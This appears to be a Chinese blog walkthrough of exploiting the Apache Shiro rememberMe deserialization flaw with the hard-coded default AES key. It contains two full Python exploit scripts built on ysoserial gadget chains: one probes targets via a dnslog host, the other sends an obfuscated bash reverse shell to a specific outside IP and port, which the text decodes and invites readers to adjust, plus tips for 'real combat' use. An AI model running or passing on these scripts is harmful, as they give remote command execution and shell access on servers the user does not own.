开始干
第一个POC主要是测试的目录可以用dnslog来进行测试

#!/usr/bin/env python3
# coding=utf-8
import sys
import uuid
import base64
import subprocess
import requests
import random
from Crypto.Cipher import AES


#EXP_CLASS = ["URLDNS"]
#EXP_CLASS = ["CommonsBeanutils1"]
#EXP_CLASS = ["CommonsCollections2"]
EXP_CLASS = ["JRMPClient"]
BLOCK_SIZE = AES.block_size
PAD_FUNC = lambda s: s + ((BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)).encode()
SHIRO_KEY = "kPH+bIxk5D2deZiIxcaaaA=="
AES_MODE = AES.MODE_CBC
AES_IV = uuid.uuid4().bytes


def attack(target):
    for _exp_class in EXP_CLASS:
        print("[*] Try to use {} payload...".format(_exp_class))
        command = ''.join(random.sample(['z','y','x','w','v','u','t','s','r','q','p','o','n','m','l','k','j','i','h','g','f','e','d','c','b','a'], 5)) + '.xo21jn.ceye.io'
        print("[*] Try to use dnslog: {}".format(command))
        popen = subprocess.Popen(["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", _exp_class,command],stdout=subprocess.PIPE)
  
        encryptor = AES.new(base64.b64decode(SHIRO_KEY), AES_MODE, AES_IV)
        file_body = PAD_FUNC(popen.stdout.read())
        base64_ciphertext = base64.b64encode(AES_IV + encryptor.encrypt(file_body))
        #print("[*] base64_ciphertext: {}".format(base64_ciphertext))
        print("[*] base64_decodeTXT: rememberMe={}".format(base64_ciphertext.decode()))
        try:
            response = requests.get(target, timeout=20, cookies={"rememberMe": base64_ciphertext.decode()})
            print ('[*] Request to target URL success!')
        except Exception as e:
            print("[x] Request to target URL fail! {}".format(e))
            break

if __name__ == '__main__':
    target=(sys.argv[1])
    attack(target)

这个主要是探测目标是否存在该漏洞
1.jpg

把对应的COOKIE复制到burp里面再次发包
2.jpg

既然已经确认了那么就直接开打了
第二个POC

#!/usr/bin/env python3
# coding=utf-8
import sys
import uuid
import base64
import subprocess
import requests
import random
from Crypto.Cipher import AES


#EXP_CLASS = ["URLDNS"]
#EXP_CLASS = ["CommonsBeanutils1"]
EXP_CLASS = ["CommonsCollections2"]
#EXP_CLASS = ["JRMPClient"]
BLOCK_SIZE = AES.block_size
PAD_FUNC = lambda s: s + ((BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)).encode()
SHIRO_KEY = "kPH+bIxk5D2deZiIxcaaaA=="
AES_MODE = AES.MODE_CBC
AES_IV = uuid.uuid4().bytes


def attack(target):
    for _exp_class in EXP_CLASS:
        print("[*] Try to use {} payload...".format(_exp_class))
        command = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTU1LjIuMTAxLzEyMzUgMD4mMQ==}|{base64,-d}|{bash,-i}"
        popen = subprocess.Popen(["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", _exp_class,command],stdout=subprocess.PIPE)
  
        encryptor = AES.new(base64.b64decode(SHIRO_KEY), AES_MODE, AES_IV)
        file_body = PAD_FUNC(popen.stdout.read())
        base64_ciphertext = base64.b64encode(AES_IV + encryptor.encrypt(file_body))
        #print("[*] base64_ciphertext: {}".format(base64_ciphertext))
        print("[*] base64_decodeTXT: rememberMe={}".format(base64_ciphertext.decode()))
        try:
            response = requests.get(target, timeout=20, cookies={"rememberMe": base64_ciphertext.decode()})
            print ('[*] Request to target URL success!')
        except Exception as e:
            print("[x] Request to target URL fail! {}".format(e))
            break

if __name__ == '__main__':
    target=(sys.argv[1])
    attack(target)

command = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTU1LjIuMTAxLzEyMzUgMD4mMQ==}|{base64,-d}|{bash,-i}"其中ehco 后面的是PAYLOAD 是经过BASE64加密的.本章中就是YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTU1LjIuMTAxLzEyMzUgMD4mMQ==这一段.解码出来就是bash -i >& /dev/tcp/139.155.2.101/1235 0>&1 根据自己的需要修改就好

然后就是PAYLOAD有可能是卡还是怎么回事有时候他反弹不成功,多尝试几次.
3.jpg

如果在实战情况中,CommonsCollections2不行的话,也可以试试CommonsBeanutils1

preView